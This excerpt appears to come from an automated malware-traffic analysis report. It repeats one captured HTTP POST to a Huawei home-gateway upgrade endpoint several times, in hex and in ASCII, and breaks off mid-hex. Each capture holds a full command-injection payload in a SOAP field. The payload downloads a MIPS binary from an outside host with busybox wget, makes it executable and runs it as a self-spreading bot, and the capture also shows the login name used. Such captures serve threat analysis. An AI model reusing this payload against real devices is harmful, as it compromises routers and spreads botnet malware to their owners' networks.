20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 